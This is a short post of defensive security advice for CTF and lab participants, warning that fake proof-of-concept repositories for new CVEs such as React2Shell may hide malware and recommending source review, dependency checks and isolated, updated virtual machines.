Important note for those participating in CTFs, cyber ranges, or simply downloading and testing tools from GitHub.
All PoCs and any software you download and build on your machine should be analyzed beforehand — not only in a sandbox, but also by reviewing the source code itself. Modern AI solutions can help with this task (but ultimately, you should rely only on yourself).
When a new trending CVE appears and there’s no working PoC yet, a huge number of repositories pop up claiming “fully working exploit guaranteed.” This happened with React2Shell.
Check all dependencies the software pulls in. Analyze what it executes and runs.
Otherwise, while you’re hacking a training machine, someone else — outside of a training environment — might be hacking you.
When participating in cyber competitions or labs like HTB, you should always use a virtual machine that is completely isolated from your work or personal system. Also:
— Keep your host OS updated
— Keep your virtualization software updated
— Monitor and properly configure your firewall
Is it inconvenient? Maybe. But in our field, it’s always a trade-off: security or convenience.
At every information security lecture I’ve given this year, I kept repeating two rules:
— Only vigilance will save you
— Your security, including information security, depends only on you.
Good luck — and stay safe in your labs.
